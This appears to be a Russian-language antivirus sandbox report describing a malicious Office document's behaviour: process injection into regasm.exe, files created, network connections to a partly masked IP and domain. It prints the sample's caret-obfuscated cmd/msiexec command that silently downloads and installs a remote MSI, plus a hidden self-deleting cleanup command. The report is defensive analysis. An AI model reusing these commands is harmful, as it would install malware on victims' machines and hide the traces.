Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i https://www.ca##nt.bg/carent/download.php?fi####################################### /qn
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{1d69fda5-2edb-405a-b928-4dd05acbd678}.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\60650870\tbixtkrzhjklnnl94gd8
Сетевая активность
Подключается к
- '91.##3.75.228':8898
TCP
- 'ca##nt.bg':443
UDP
- DNS ASK ca##nt.bg
Другое
Ищет следующие окна
- ClassName: 'Shell_traywnd' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\installer\msi4add.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i https://www.ca##nt.bg/carent/download.php?fi####################################### /qn' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%WINDIR%\Installer\MSI4ADD.tmp"' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i https://www.ca##nt.bg/carent/download.php?fi####################################### /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
- '%WINDIR%\syswow64\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%WINDIR%\Installer\MSI4ADD.tmp"
- '%WINDIR%\syswow64\choice.exe' /C Y /N /D Y /T 3
